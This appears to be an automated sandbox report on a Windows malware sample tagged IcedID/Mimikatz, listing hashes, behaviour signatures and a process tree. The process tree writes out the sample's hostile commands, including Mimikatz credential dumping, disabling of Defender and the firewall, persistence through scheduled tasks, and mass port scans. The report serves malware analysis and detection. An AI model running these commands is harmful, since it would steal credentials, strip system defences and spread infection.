Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-08-2024 08:25

General

  • Target

    2024-08-03_52d05362d109a9ae3587fc4e70788a45_hacktools_icedid_mimikatz.exe

  • Size

    9.0MB

  • MD5

    52d05362d109a9ae3587fc4e70788a45

  • SHA1

    cd125b95d88586c45c861650a48b2b3232aecc18

  • SHA256

    d30ebf31009ad08be27e58284a438724e3a0717f9d31dc1f60c763031f600bfa

  • SHA512

    d7b1043cd3b6424473b1699671ff447894af645419edcbe4cb7e84878807637a8c69b174fb7fe30d4ad6020f117a100c47be135e2d8a5525277a6caa6baa56bf

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (29789) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 39 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1880
      • C:\Windows\TEMP\nibfjuzli\nyuscu.exe
        "C:\Windows\TEMP\nibfjuzli\nyuscu.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3244
    • C:\Users\Admin\AppData\Local\Temp\2024-08-03_52d05362d109a9ae3587fc4e70788a45_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-08-03_52d05362d109a9ae3587fc4e70788a45_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1884
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\stciiuti\ebatcat.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2712
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:208
        • C:\Windows\stciiuti\ebatcat.exe
          C:\Windows\stciiuti\ebatcat.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1736
    • C:\Windows\stciiuti\ebatcat.exe
      C:\Windows\stciiuti\ebatcat.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2608
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4988
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:4560
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4456
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
              PID:4476
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1140
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4788
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4384
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:1020
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:4716
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:3728
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\zqlvuicyk\vwbsbuuyf\wpcap.exe /S
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4680
            • C:\Windows\zqlvuicyk\vwbsbuuyf\wpcap.exe
              C:\Windows\zqlvuicyk\vwbsbuuyf\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • Suspicious use of WriteProcessMemory
              PID:2676
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3404
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                    PID:732
                • C:\Windows\SysWOW64\net.exe
                  net stop "TrueSight Meter"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2992
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "TrueSight Meter"
                    5⤵
                      PID:1832
                  • C:\Windows\SysWOW64\net.exe
                    net stop npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:1660
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop npf
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:3716
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:2060
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:3220
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:3884
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1740
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:2640
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:3300
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:5076
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:4100
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\zqlvuicyk\vwbsbuuyf\ytyptbttb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zqlvuicyk\vwbsbuuyf\Scant.txt
                2⤵
                • System Location Discovery: System Language Discovery
                PID:4400
                • C:\Windows\zqlvuicyk\vwbsbuuyf\ytyptbttb.exe
                  C:\Windows\zqlvuicyk\vwbsbuuyf\ytyptbttb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zqlvuicyk\vwbsbuuyf\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:3700
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\zqlvuicyk\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\zqlvuicyk\Corporate\log.txt
                2⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:3540
                • C:\Windows\zqlvuicyk\Corporate\vfshost.exe
                  C:\Windows\zqlvuicyk\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2244
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lgcckzfmz" /ru system /tr "cmd /c C:\Windows\ime\ebatcat.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2068
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:4944
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "lgcckzfmz" /ru system /tr "cmd /c C:\Windows\ime\ebatcat.exe"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2072
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ztatibiub" /ru system /tr "cmd /c echo Y|cacls C:\Windows\stciiuti\ebatcat.exe /p everyone:F"
                  2⤵
                    PID:2648
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1016
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "ztatibiub" /ru system /tr "cmd /c echo Y|cacls C:\Windows\stciiuti\ebatcat.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1248
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iqglcigvb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nibfjuzli\nyuscu.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1408
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4568
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "iqglcigvb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nibfjuzli\nyuscu.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:412
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4948
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4900
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:2256
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3764
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1556
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1932
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1008
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2584
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4848
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1660
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3996
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3152
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4804
                    • C:\Windows\SysWOW64\net.exe
                      net stop SharedAccess
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1240
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop SharedAccess
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:4968
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2360
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh firewall set opmode mode=disable
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2848
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh Advfirewall set allprofiles state off
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:624
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh Advfirewall set allprofiles state off
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2896
                  • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                    C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 776 C:\Windows\TEMP\zqlvuicyk\776.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3744
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop MpsSvc
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:224
                    • C:\Windows\SysWOW64\net.exe
                      net stop MpsSvc
                      3⤵
                        PID:3556
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop MpsSvc
                          4⤵
                            PID:4988
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop WinDefend
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:1936
                        • C:\Windows\SysWOW64\net.exe
                          net stop WinDefend
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:3708
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop WinDefend
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:3248
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop wuauserv
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4436
                        • C:\Windows\SysWOW64\net.exe
                          net stop wuauserv
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2100
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop wuauserv
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:1248
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config MpsSvc start= disabled
                        2⤵
                          PID:2092
                          • C:\Windows\SysWOW64\sc.exe
                            sc config MpsSvc start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:3224
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config SharedAccess start= disabled
                          2⤵
                            PID:2716
                            • C:\Windows\SysWOW64\sc.exe
                              sc config SharedAccess start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:4716
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config WinDefend start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4668
                            • C:\Windows\SysWOW64\sc.exe
                              sc config WinDefend start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:4948
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config wuauserv start= disabled
                            2⤵
                              PID:4400
                              • C:\Windows\SysWOW64\sc.exe
                                sc config wuauserv start= disabled
                                3⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:4584
                            • C:\Windows\TEMP\xohudmc.exe
                              C:\Windows\TEMP\xohudmc.exe
                              2⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • Suspicious use of SetWindowsHookEx
                              PID:396
                            • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                              C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 60 C:\Windows\TEMP\zqlvuicyk\60.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4612
                            • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                              C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 1880 C:\Windows\TEMP\zqlvuicyk\1880.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1556
                            • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                              C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 2628 C:\Windows\TEMP\zqlvuicyk\2628.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4672
                            • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                              C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 2796 C:\Windows\TEMP\zqlvuicyk\2796.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3912
                            • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                              C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 2888 C:\Windows\TEMP\zqlvuicyk\2888.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3480
                            • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                              C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 3108 C:\Windows\TEMP\zqlvuicyk\3108.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:800
                            • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                              C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 3820 C:\Windows\TEMP\zqlvuicyk\3820.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2360
                            • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                              C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 3952 C:\Windows\TEMP\zqlvuicyk\3952.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4512
                            • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                              C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 4016 C:\Windows\TEMP\zqlvuicyk\4016.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4308
                            • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                              C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 1116 C:\Windows\TEMP\zqlvuicyk\1116.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4952
                            • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                              C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 4936 C:\Windows\TEMP\zqlvuicyk\4936.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4788
                            • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                              C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 1396 C:\Windows\TEMP\zqlvuicyk\1396.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5028
                            • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                              C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 2904 C:\Windows\TEMP\zqlvuicyk\2904.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1160
                            • C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe
                              C:\Windows\TEMP\zqlvuicyk\twmgqqgit.exe -accepteula -mp 4900 C:\Windows\TEMP\zqlvuicyk\4900.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1496
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c C:\Windows\zqlvuicyk\vwbsbuuyf\scan.bat
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:3996
                              • C:\Windows\zqlvuicyk\vwbsbuuyf\nfuriuvin.exe
                                nfuriuvin.exe TCP 194.110.0.1 194.110.255.255 445 512 /save
                                3⤵
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                PID:2956
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                              2⤵
                                PID:2872
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1416
                                • C:\Windows\SysWOW64\cacls.exe
                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1428
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2848
                                • C:\Windows\SysWOW64\cacls.exe
                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4656
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                    PID:4352
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                    3⤵
                                      PID:2516
                                • C:\Windows\SysWOW64\meouau.exe
                                  C:\Windows\SysWOW64\meouau.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4568
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                  1⤵
                                    PID:1856
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ebatcat.exe
                                    1⤵
                                      PID:1424
                                      • C:\Windows\ime\ebatcat.exe
                                        C:\Windows\ime\ebatcat.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3248
                                    • C:\Windows\system32\cmd.EXE
                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\stciiuti\ebatcat.exe /p everyone:F
                                      1⤵
                                        PID:1384
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          2⤵
                                            PID:1056
                                          • C:\Windows\system32\cacls.exe
                                            cacls C:\Windows\stciiuti\ebatcat.exe /p everyone:F
                                            2⤵
                                              PID:220
                                          • C:\Windows\system32\cmd.EXE
                                            C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\nibfjuzli\nyuscu.exe /p everyone:F
                                            1⤵
                                              PID:3176
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                2⤵
                                                  PID:4260
                                                • C:\Windows\system32\cacls.exe
                                                  cacls C:\Windows\TEMP\nibfjuzli\nyuscu.exe /p everyone:F
                                                  2⤵
                                                    PID:1872
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                  1⤵
                                                    PID:1436
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                    1⤵
                                                      PID:4308
                                                    • C:\Windows\system32\cmd.EXE
                                                      C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ebatcat.exe
                                                      1⤵
                                                        PID:5872
                                                        • C:\Windows\ime\ebatcat.exe
                                                          C:\Windows\ime\ebatcat.exe
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:4828
